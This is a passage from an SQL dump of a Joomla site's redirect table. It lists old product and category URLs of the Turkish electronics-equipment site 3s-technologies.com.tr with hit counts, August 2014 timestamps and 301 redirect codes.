00:00:00',301),(417,'http://3s-technologies.com.tr/index.php/tr/kart-temizlemesi','','','',7,0,'2014-08-04 08:11:20','0000-00-00 00:00:00',301),(418,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=88&Itemid=100','','','',9,0,'2014-08-04 08:13:47','0000-00-00 00:00:00',301),(419,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=141:marksman&catid=56:rework-stasyonlari&Itemid=143&lang=tr','','','',13,0,'2014-08-04 08:14:21','0000-00-00 00:00:00',301),(420,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=46:konveyorler&Itemid=62&layout=default&lang=tr','','','',3,0,'2014-08-04 08:16:26','0000-00-00 00:00:00',301),(421,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=46:konveyorler&Itemid=62&layout=default&lang=tr','','','',5,0,'2014-08-04 08:18:32','0000-00-00 00:00:00',301),(422,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=115:kutulanmis-hava-air&catid=40:temizleme&Itemid=126&lang=tr','','','',3,0,'2014-08-04 08:22:45','0000-00-00 00:00:00',301),(423,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=174:rh61&catid=60:ikinciel&Itemid=164&lang=tr','','','',66,0,'2014-08-04 08:28:57','0000-00-00 00:00:00',301),(424,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=73&Itemid=82&lang=tr','','','',13,0,'2014-08-04 08:37:41','0000-00-00 00:00:00',301),(425,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=147&Itemid=146&lang=en','','','',9,0,'2014-08-04 08:37:44','0000-00-00 00:00:00',301),(426,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=115&Itemid=126&lang=en','','','',19,0,'2014-08-04 08:37:50','0000-00-00 00:00:00',301),(427,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=43:ultra-hizli&Itemid=2&layout=default&lang=tr','','','',3,0,'2014-08-04 08:39:52','0000-00-00 00:00:00',301),(428,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=87&Itemid=99','','','',8,0,'2014-08-04 08:40:58','0000-00-00 00:00:00',301),(429,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=43:ultra-hizli&Itemid=2&layout=default&lang=tr','','','',17,0,'2014-08-04 08:42:04','0000-00-00 00:00:00',301),(430,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=110:ekonomik-flux-giderici-pro&catid=40:temizleme&Itemid=121&lang=en','','','',2,0,'2014-08-04 08:48:01','0000-00-00 00:00:00',301),(431,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=110:ekonomik-flux-giderici-pro&catid=40:temizleme&Itemid=121&lang=tr','','','',2,0,'2014-08-04 08:54:33','0000-00-00 00:00:00',301),(432,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=164&Itemid=160&lang=tr','','','',1,0,'2014-08-04 08:59:00','0000-00-00 00:00:00',301),(433,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=152&Itemid=153&lang=tr','','','',7,0,'2014-08-04 08:59:01','0000-00-00 00:00:00',301),(434,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=71&Itemid=79&lang=tr','','','',5,0,'2014-08-04 09:01:04','0000-00-00 00:00:00',301),(435,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=110:ekonomik-flux-giderici-pro&catid=40:temizleme&Itemid=121&lang=en','','','',8,0,'2014-08-04 09:03:36','0000-00-00 00:00:00',301),(436,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=36&Itemid=37&lang=tr','','','',34,0,'2014-08-04 09:04:24','0000-00-00 00:00:00',301),(437,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=59&Itemid=155&lang=en','','','',29,0,'2014-08-04 09:09:19','0000-00-00 00:00:00',301),(438,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=55:katalog&Itemid=1&layout=default&lang=en','','','',10,0,'2014-08-04 09:10:54','0000-00-00 00:00:00',301),(439,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=111:stencil-temizleme-bga&catid=40:temizleme&Itemid=122&lang=en','','','',2,0,'2014-08-04 09:13:35','0000-00-00 00:00:00',301),(440,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=152:ls60&catid=58:dusuk-hizli-smd-dizgi&Itemid=153&lang=en','','','',4,0,'2014-08-04 09:18:12','0000-00-00 00:00:00',301),(441,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=73:ly-8c&catid=41:smd-firin&Itemid=82&lang=en','','','',6,0,'2014-08-04 09:18:57','0000-00-00 00:00:00',301),(442,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=41&Itemid=55&lang=tr','','','',33,0,'2014-08-04 09:19:11','0000-00-00 00:00:00',301),(443,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=73:ly-8c&catid=41:smd-firin&Itemid=82&lang=en','','','',61,0,'2014-08-04 09:21:39','0000-00-00 00:00:00',301),(444,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=97&Itemid=108&lang=tr','','','',1,0,'2014-08-04 09:27:00','0000-00-00 00:00:00',301),(445,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=119&Itemid=117&lang=en','','','',4,0,'2014-08-04 09:27:04','0000-00-00 00:00:00',301),(446,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=73:ly-8c&catid=41:smd-firin&Itemid=82&lang=en','','','',3,0,'2014-08-04 09:27:07','0000-00-00 00:00:00',301),(447,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=97&Itemid=108&lang=en','','','',2,0,'2014-08-04 09:29:53','0000-00-00 00:00:00',301),(448,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=107:yuksek-guclu-flux-giderici-frc&catid=40:temizleme&Itemid=118&lang=en','','','',2,0,'2014-08-04 09:29:58','0000-00-00 00:00:00',301),(449,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=51:neo&Itemid=92&layout=default&lang=tr','','','',55,0,'2014-08-04 09:35:34','0000-00-00 00:00:00',301),(450,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=115:kutulanmis-hava-air&catid=40:temizleme&Itemid=126&lang=tr','','','',6,0,'2014-08-04 09:37:44','0000-00-00 00:00:00',301),(451,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=106:mi-300&catid=44:pota&Itemid=113&lang=tr','','','',1,0,'2014-08-04 09:39:47','0000-00-00 00:00:00',301),(452,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=36&Itemid=37&lang=en','','','',5,0,'2014-08-04 09:41:04','0000-00-00 00:00:00',301),(453,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=51:neo&Itemid=92&layout=default&lang=en','','','',64,0,'2014-08-04 09:42:53','0000-00-00 00:00:00',301),(454,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=51:neo&Itemid=92&layout=default&lang=en','','','',3,0,'2014-08-04 09:44:26','0000-00-00 00:00:00',301),(455,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=55&Itemid=1&lang=en','','','',2,0,'2014-08-04 09:47:18','0000-00-00 00:00:00',301),(456,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=87&Itemid=99&lang=tr','','','',41,0,'2014-08-04 09:49:06','0000-00-00 00:00:00',301),(457,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=55&Itemid=1&lang=en','','','',3,0,'2014-08-04 09:50:28','0000-00-00 00:00:00',301),(458,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=59&Itemid=155&lang=tr','','','',29,0,'2014-08-04 09:54:26','0000-00-00 00:00:00',301),(459,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=160:gf-12-hcht&catid=41:smd-firin&Itemid=161&lang=en','','','',55,0,'2014-08-04 09:56:09','0000-00-00 00:00:00',301),(460,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=121&Itemid=115&lang=en','','','',1,0,'2014-08-04 10:00:26','0000-00-00 00:00:00',301),(461,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=160:gf-12-hcht&catid=41:smd-firin&Itemid=161&lang=en','','','',7,0,'2014-08-04 10:00:29','0000-00-00 00:00:00',301),(462,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=166:lfs-1&catid=44:pota&Itemid=144&lang=tr','','','',8,0,'2014-08-04 10:04:23','0000-00-00 00:00:00',301),(463,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=139&Itemid=141&lang=tr','','','',22,0,'2014-08-04 10:06:09','0000-00-00 00:00:00',301),(464,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=168&Itemid=58&lang=en','','','',27,0,'2014-08-04 10:08:40','0000-00-00 00:00:00',301),(465,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=56&Itemid=137&lang=tr','','','',3,0,'2014-08-04 10:11:04','0000-00-00 00:00:00',301),(466,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=80&Itemid=87&lang=tr','','','',2,0,'2014-08-04 10:11:51','0000-00-00 00:00:00',301),(467,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=159&Itemid=162&lang=en','','','',30,0,'2014-08-04 10:20:30','0000-00-00 00:00:00',301),(468,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=121&Itemid=115&lang=tr','','','',4,0,'2014-08-04 10:21:47','0000-00-00 00:00:00',301),(469,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=94&Itemid=105&lang=tr','','','',1,0,'2014-08-04 10:26:13','0000-00-00 00:00:00',301),(470,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=91:osai-neo&catid=1:son-haberler&Itemid=28&lang=tr','','','',26,0,'2014-08-04 10:26:52','0000-00-00 00:00:00',301),(471,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=156:lf-350b&catid=44:pota&Itemid=157&lang=en','','','',2,0,'2014-08-04 10:27:00','0000-00-00 00:00:00',301),(472,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=149&Itemid=150&lang=tr','','','',2,0,'2014-08-04 10:32:57','0000-00-00 00:00:00',301),(473,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=147&Itemid=146&lang=en','','','',1,0,'2014-08-04 10:32:58','0000-00-00 00:00:00',301),(474,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=110&Itemid=121&lang=en','','','',2,0,'2014-08-04 10:37:19','0000-00-00 00:00:00',301),(475,'http://3s-technologies.com.tr/index.php/tr/lehimleme-hakk-nda','','','',7,0,'2014-08-04 10:38:47','0000-00-00 00:00:00',301),(476,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=108&Itemid=119&lang=en','','','',31,0,'2014-08-04 10:41:44','0000-00-00 00:00:00',301),(477,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=43&Itemid=2&lang=tr','','','',33,0,'2014-08-04 10:43:18','0000-00-00 00:00:00',301),(478,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=41&Itemid=55&lang=tr','','','',1,0,'2014-08-04 10:47:45','0000-00-00 00:00:00',301),(479,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=174:rh61&catid=60:ikinciel&Itemid=164&lang=tr','','','',1,0,'2014-08-04 10:52:09','0000-00-00 00:00:00',301),(480,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=53&Itemid=110&lang=tr','','','',32,0,'2014-08-04 10:52:11','0000-00-00 00:00:00',301),(481,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=72&Itemid=78&lang=en','','','',1,0,'2014-08-04 10:55:12','0000-00-00 00:00:00',301),(482,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=42:th-dizgi&Itemid=27&layout=default&lang=tr','','','',2,0,'2014-08-04 10:56:45','0000-00-00 00:00:00',301),(483,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=46&Itemid=62&lang=tr','','','',33,0,'2014-08-04 10:58:13','0000-00-00 00:00:00',301),(484,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=98&Itemid=109&lang=en','','','',1,0,'2014-08-04 10:58:14','0000-00-00 00:00:00',301),(485,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=41:smd-firin&Itemid=55&layout=default&lang=en','','','',10,0,'2014-08-04 10:59:42','0000-00-00 00:00:00',301),(486,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=145&Itemid=147&lang=tr','','','',1,0,'2014-08-04 11:01:11','0000-00-00 00:00:00',301),(487,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=41:smd-firin&Itemid=55&layout=default&lang=en','','','',14,0,'2014-08-04 11:01:13','0000-00-00 00:00:00',301),(488,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=40&Itemid=60&lang=tr','','','',1,0,'2014-08-04 11:02:42','0000-00-00 00:00:00',301),(489,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=165:microcare&catid=1:son-haberler&Itemid=28&lang=tr','','','',11,0,'2014-08-04 11:02:44','0000-00-00 00:00:00',301),(490,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=46&Itemid=62&lang=tr','','','',30,0,'2014-08-04 11:08:57','0000-00-00 00:00:00',301),(491,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=155:ct-3000n&catid=44:pota&Itemid=81&lang=en','','','',1,0,'2014-08-04 11:09:50','0000-00-00 00:00:00',301),(492,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=84&Itemid=96&lang=en','','','',6,0,'2014-08-04 11:09:50','0000-00-00 00:00:00',301),(493,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=165:microcare&catid=1:son-haberler&Itemid=28&lang=en','','','',9,0,'2014-08-04 11:12:30','0000-00-00 00:00:00',301),(494,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=167:lr4&catid=41:smd-firin&Itemid=163&lang=tr','','','',3,0,'2014-08-04 11:17:07','0000-00-00 00:00:00',301),(495,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=116&Itemid=127&lang=en','','','',12,0,'2014-08-04 11:18:53','0000-00-00 00:00:00',301),(496,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=86:mx350&catid=36:orta-hizli&Itemid=98&lang=en','','','',3,0,'2014-08-04 11:18:54','0000-00-00 00:00:00',301),(497,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=114&Itemid=124&lang=en','','','',30,0,'2014-08-04 11:21:45','0000-00-00 00:00:00',301),(498,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=71&Itemid=79&lang=tr','','','',3,0,'2014-08-04 11:23:30','0000-00-00 00:00:00',301),(499,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=39&Itemid=57&lang=tr','','','',34,0,'2014-08-04 11:24:26','0000-00-00 00:00:00',301),(500,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=112:smd-firin-temizleme-roc&catid=40:temizleme&Itemid=123&lang=tr','','','',2,0,'2014-08-04 11:25:21','0000-00-00 00:00:00',301),(501,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=96&Itemid=107&lang=tr','','','',1,0,'2014-08-04 11:27:07','0000-00-00 00:00:00',301),(502,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=44&Itemid=56','','','',1,0,'2014-08-04 11:27:43','0000-00-00 00:00:00',301),(503,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=137:chip-max-rosh-rdy&catid=56:rework-stasyonlari&Itemid=139&lang=en','','','',9,0,'2014-08-04 11:28:52','0000-00-00 00:00:00',301),(504,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=80:cm101&catid=43:ultra-hizli&Itemid=87&lang=tr','','','',5,0,'2014-08-04 11:34:24','0000-00-00 00:00:00',301),(505,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=80&Itemid=87&lang=tr','','','',2,0,'2014-08-04 11:43:06','0000-00-00 00:00:00',301),(506,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=150:le40&catid=58:dusuk-hizli-smd-dizgi&Itemid=151&lang=tr','','','',37,0,'2014-08-04 11:44:51','0000-00-00 00:00:00',301),(507,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=175:rh2&catid=60:ikinciel&Itemid=164&lang=tr','','','',3,0,'2014-08-04 11:46:39','0000-00-00 00:00:00',301),(508,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=59&Itemid=155&lang=tr','','','',3,0,'2014-08-04 11:47:43','0000-00-00 00:00:00',301),(509,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=159&Itemid=162&lang=en','','','',11,0,'2014-08-04 11:48:26','0000-00-00 00:00:00',301),(510,'http://www.3s-technologies.com.tr/index.php/trackback/','','http://www.3s-technologies.com.tr/index.php?lang=en','',63,0,'2014-08-04 11:51:54','0000-00-00 00:00:00',301),(511,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=117&Itemid=128&lang=tr','','','',24,0,'2014-08-04 11:52:51','0000-00-00 00:00:00',301),(512,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=117&Itemid=128&lang=en','','','',17,0,'2014-08-04 11:55:31','0000-00-00 00:00:00',301),(513,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=1&layout=blog&Itemid=28&lang=tr','','','',1,0,'2014-08-04 11:57:43','0000-00-00 00:00:00',301),(514,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=138&Itemid=140&lang=en','','','',2,0,'2014-08-04 11:58:12','0000-00-00 00:00:00',301),(515,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=117&Itemid=128&lang=tr','','','',34,0,'2014-08-04 11:58:16','0000-00-00 00:00:00',301),(516,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=117&Itemid=128&lang=tr','','','',1,0,'2014-08-04 12:00:07','0000-00-00 00:00:00',301),(517,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=95&Itemid=106&lang=en','','','',7,0,'2014-08-04 12:04:33','0000-00-00 00:00:00',301),(518,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=159&Itemid=162&lang=en','','','',2,0,'2014-08-04 12:07:16','0000-00-00 00:00:00',301),(519,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=95&Itemid=106&lang=en','','','',9,0,'2014-08-04 12:07:18','0000-00-00 00:00:00',301),(520,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=114:stensil-temizleme-rulolari-microwipe&catid=40:temizleme&Itemid=124&lang=tr','','','',2,0,'2014-08-04 12:11:05','0000-00-00 00:00:00',301),(521,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=94&Itemid=105&lang=en','','','',25,0,'2014-08-04 12:13:29','0000-00-00 00:00:00',301),(522,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=43:ultra-hizli&Itemid=2&layout=default&lang=en','','','',3,0,'2014-08-04 12:17:19','0000-00-00 00:00:00',301),(523,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=88&Itemid=100&lang=tr','','','',30,0,'2014-08-04 12:17:43','0000-00-00 00:00:00',301),(524,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=58:dusuk-hizli-smd-dizgi&Itemid=149&layout=default&lang=tr','','','',3,0,'2014-08-04 12:19:18','0000-00-00 00:00:00',301),(525,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=141&Itemid=143&lang=en','','','',4,0,'2014-08-04 12:21:03','0000-00-00 00:00:00',301),(526,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=146&Itemid=148&lang=tr','','','',1,0,'2014-08-04 12:21:12','0000-00-00 00:00:00',301),(527,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=166:lfs-1&catid=44:pota&Itemid=144&lang=tr','','','',19,0,'2014-08-04 12:22:09','0000-00-00 00:00:00',301),(528,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=51&Itemid=92&lang=en','','','',1,0,'2014-08-04 12:22:10','0000-00-00 00:00:00',301),(529,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=166:lfs-1&catid=44:pota&Itemid=144&lang=tr','','','',10,0,'2014-08-04 12:24:03','0000-00-00 00:00:00',301),(530,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=166:lfs-1&catid=44:pota&Itemid=144&lang=tr','','','',3,0,'2014-08-04 12:26:03','0000-00-00 00:00:00',301),(531,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=110&Itemid=121&lang=tr','','','',32,0,'2014-08-04 12:34:36','0000-00-00 00:00:00',301),(532,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=127&Itemid=134&lang=en','','','',21,0,'2014-08-04 12:36:28','0000-00-00 00:00:00',301),(533,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=97&Itemid=108&lang=tr','','','',3,0,'2014-08-04 12:37:44','0000-00-00 00:00:00',301),(534,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=127&Itemid=134&lang=en','','','',17,0,'2014-08-04 12:38:22','0000-00-00 00:00:00',301),(535,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=93&Itemid=104&lang=en','','','',14,0,'2014-08-04 12:46:17','0000-00-00 00:00:00',301),(536,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=80&Itemid=87&lang=tr','','','',6,0,'2014-08-04 12:47:43','0000-00-00 00:00:00',301),(537,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=93&Itemid=104&lang=tr','','','',4,0,'2014-08-04 12:48:13','0000-00-00 00:00:00',301),(538,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=106:mi-300&catid=44:pota&Itemid=113&lang=en','','','',7,0,'2014-08-04 12:50:05','0000-00-00 00:00:00',301),(539,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=106:mi-300&catid=44:pota&Itemid=113&lang=en','','','',1,0,'2014-08-04 12:51:59','0000-00-00 00:00:00',301),(540,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=106:mi-300&catid=44:pota&Itemid=113&lang=tr','','','',12,0,'2014-08-04 12:53:53','0000-00-00 00:00:00',301),(541,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=90&Itemid=102&lang=tr','','','',4,0,'2014-08-04 12:54:24','0000-00-00 00:00:00',301),(542,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=106:mi-300&catid=44:pota&Itemid=113&lang=en','','','',9,0,'2014-08-04 12:55:50','0000-00-00 00:00:00',301),(543,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=106:mi-300&catid=44:pota&Itemid=113&lang=tr','','','',2,0,'2014-08-04 12:57:52','0000-00-00 00:00:00',301),(544,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=176:jvk1&catid=60:ikinciel&Itemid=164&lang=tr','','','',26,0,'2014-08-04 13:01:41','0000-00-00 00:00:00',301),(545,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=176:jvk1&catid=60:ikinciel&Itemid=164&lang=tr','','','',4,0,'2014-08-04 13:03:39','0000-00-00 00:00:00',301),(546,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=153:ls60v&catid=58:dusuk-hizli-smd-dizgi&Itemid=154&lang=tr','','','',12,0,'2014-08-04 13:05:36','0000-00-00 00:00:00',301),(547,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=153:ls60v&catid=58:dusuk-hizli-smd-dizgi&Itemid=154&lang=tr','','','',80,0,'2014-08-04 13:07:31','0000-00-00 00:00:00',301),(548,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=105&Itemid=112&lang=en','','','',9,0,'2014-08-04 13:09:25','0000-00-00 00:00:00',301),(549,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=105&Itemid=112&lang=en','','','',1,0,'2014-08-04 13:11:22','0000-00-00 00:00:00',301),(550,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=160&Itemid=161&lang=en','','','',2,0,'2014-08-04 13:13:18','0000-00-00 00:00:00',301),(551,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=57:screen-printer&Itemid=145&layout=default&lang=en','','','',63,0,'2014-08-04 13:16:08','0000-00-00 00:00:00',301),(552,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=57:screen-printer&Itemid=145&layout=default&lang=en','','','',3,0,'2014-08-04 13:18:04','0000-00-00 00:00:00',301),(553,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=160&Itemid=161&lang=tr','','','',2,0,'2014-08-04 13:20:00','0000-00-00 00:00:00',301),(554,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=159:gf-c2-ht&catid=41:smd-firin&Itemid=162&lang=en','','','',5,0,'2014-08-04 13:27:44','0000-00-00 00:00:00',301),(555,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=89:neosold&catid=51:neo&Itemid=101&lang=tr','','','',2,0,'2014-08-04 13:29:51','0000-00-00 00:00:00',301),(556,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=44:pota&Itemid=56&layout=default&lang=en','','','',13,0,'2014-08-04 13:31:52','0000-00-00 00:00:00',301),(557,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=44:pota&Itemid=56&layout=default&lang=en','','','',1,0,'2014-08-04 13:33:54','0000-00-00 00:00:00',301),(558,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=58&Itemid=149&lang=tr','','','',6,0,'2014-08-04 13:36:15','0000-00-00 00:00:00',301),(559,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=136&Itemid=138&lang=en','','','',115,0,'2014-08-04 13:37:48','0000-00-00 00:00:00',301),(560,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=173:avf1&catid=60:ikinciel&Itemid=164&lang=tr','','','',39,0,'2014-08-04 13:40:22','0000-00-00 00:00:00',301),(561,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=120&Itemid=116&lang=en','','','',10,0,'2014-08-04 13:45:19','0000-00-00 00:00:00',301),(562,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=54&Itemid=114&lang=en','','','',26,0,'2014-08-04 13:46:30','0000-00-00 00:00:00',301),(563,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=category&id=43:ultra-hizli&Itemid=2&layout=default&lang=en','','','',8,0,'2014-08-04 13:49:22','0000-00-00 00:00:00',301),(564,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=60&Itemid=164&lang=tr','','','',32,0,'2014-08-04 13:50:55','0000-00-00 00:00:00',301),(565,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=60&Itemid=164&lang=en','','','',6,0,'2014-08-04 13:52:57','0000-00-00 00:00:00',301),(566,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=40&Itemid=60&lang=en','','','',12,0,'2014-08-04 13:54:54','0000-00-00 00:00:00',301),(567,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=136:chipper-smd-500&catid=56:rework-stasyonlari&Itemid=138&lang=tr','','','',53,0,'2014-08-04 13:56:49','0000-00-00 00:00:00',301),(568,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=40&Itemid=60&lang=tr','','','',31,0,'2014-08-04 13:58:47','0000-00-00 00:00:00',301),(569,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=88&Itemid=100&lang=tr','','','',5,0,'2014-08-04 14:01:06','0000-00-00 00:00:00',301),(570,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=47:aoi&Itemid=1&layout=default&lang=tr','','','',11,0,'2014-08-04 14:04:23','0000-00-00 00:00:00',301),(571,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=86:mx350&catid=36:orta-hizli&Itemid=98&lang=en','','','',63,0,'2014-08-04 